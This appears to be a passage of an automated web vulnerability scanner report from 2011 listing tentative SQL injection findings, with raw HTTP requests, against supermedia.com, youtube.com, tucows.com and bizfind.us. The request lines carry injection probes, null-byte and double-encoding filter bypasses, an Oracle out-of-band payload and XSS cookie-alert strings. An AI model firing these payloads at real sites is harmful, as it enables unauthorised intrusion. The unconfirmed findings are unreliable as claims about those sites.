Path:   /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns'=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1495
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=DPMOGJOBNNLPMDCLNBMEICJC; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS'="ALERT(0X0006C1)</title
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns''=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11750
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=KPMOGJOBMLCCEDABHNCMIGKC; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22/"NS''="ALERT(0X0006C1)</titl
...[SNIP]...

1.16. http://www.supermedia.com/support/contact-us/ [CstrStatus cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.supermedia.com
Path:   /support/contact-us/

Issue detail

The CstrStatus cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CstrStatus cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /support/contact-us/ HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://ir.supermedia.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U%00'; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762069|check#true#1296760269; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:18:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 24645


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Contact SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this reque
...[SNIP]...

Request 2

GET /support/contact-us/ HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://ir.supermedia.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U%00''; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762069|check#true#1296760269; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:18:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 24302


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Contact SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...

1.17. https://www.supermedia.com/spportal/indexLogin.do [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /spportal/indexLogin.do

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /spportal/indexLogin.do HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true'; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:29:58 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
referrer="http://www.google.com/search?hl=en&q=f82520213c151ae1ef1e25df";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key '.80070</script>
...[SNIP]...

Request 2

GET /spportal/indexLogin.do HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true''; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...

1.18. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27&1'=1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761732|check#true#1296759932; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:05 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20261


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
e next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this reque
...[SNIP]...

Request 2

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27&1''=1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761732|check#true#1296759932; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:17 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 19960


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...

1.19. https://www.supermedia.com/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C'

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_sq cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D%2527; undefined_s=First%20Visit

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:06:31 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 21158


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
e next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key ''||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL
...[SNIP]...

Request 2

GET /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D%2527%2527; undefined_s=First%20Visit

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:06:32 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20820


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...

1.20. http://www.youtube.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:01 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=Lw2qL_Rbihs; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:01 GMT
Set-Cookie: GEO=66cfdf9c9df4e3b550a4e342d19a849ccwsAAAAzVVOtwdbzTUsQhQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFZPU0o2Q1NWcms5RzNVSHc1cU94dGh3Vl9YTm0wbXJlV3J0czgyY3BHNzF3 -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Making Out FAIL" data-thumb="//i2.ytimg.com/vi/msJrcliQP8s/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" >
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:01 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=x1-FJdMfy6I; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:01 GMT
Set-Cookie: GEO=66cfdf9c9df4e3b550a4e342d19a849ccwsAAAAzVVOtwdbzTUsQhQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFduWHJIWGFVcEtxc1FnQXdlcEVhZF8tYU5WbWpobkx6cm82NGZkd2dsNWRB -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

1.21. http://www.youtube.com/ [hl parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /

Issue detail

The hl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /?hl=en%00'&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:47:56 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 21:47:56 GMT
Set-Cookie: GEO=1511cab9604e8f09758fe0408381df3bcwsAAAAzVVOtwdbzTUsijA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFhXeklCak9QRXZYaG02c2d1ZDJJMFJMQUcwVTB6eW9DRUl2ZzhlNVZZSkxn -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Making Out FAIL" data-thumb="//i2.ytimg.com/vi/msJrcliQP8s/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" >
...[SNIP]...

Request 2

GET /?hl=en%00''&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:47:56 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 21:47:56 GMT
Set-Cookie: GEO=1511cab9604e8f09758fe0408381df3bcwsAAAAzVVOtwdbzTUsijA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFhNa0xiQlNoRjdhcExFWmdaOFNIVVFBalJGVGkzZVpfRjdhSVNUMmVSWjRR -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

1.22. http://www.youtube.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:59 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=ToX6xrflukg; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:30:59 GMT
Set-Cookie: GEO=cd292126a2309f40972ca5321f4112a7cwsAAAAzVVOtwdbzTUsQgw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFdqOG5zd1o2TzFRbHg5QUlZeGpVb3hGTkVJSm50WVhWREpLUUNMS3NrUU9n -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Making Out FAIL" data-thumb="//i2.ytimg.com/vi/msJrcliQP8s/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" >
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:59 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=kWeqQ-wJhd4; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:30:59 GMT
Set-Cookie: GEO=cd292126a2309f40972ca5321f4112a7cwsAAAAzVVOtwdbzTUsQgw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nUXNCUHlydnptdzhMeVpVZDN2ZGtQdF9FU0hoalNNX0VCeG9LX2oyRUFmTGNndWJydFUwR0J3 -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

1.23. http://www8.tucows.com/delivery/afr.php [OAVARS[aed03704] cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Issue detail

The OAVARS[aed03704] cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the OAVARS[aed03704] cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the OAVARS[aed03704] cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /delivery/afr.php?n=aed03704&zoneid=124&cb=70c60a12 HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
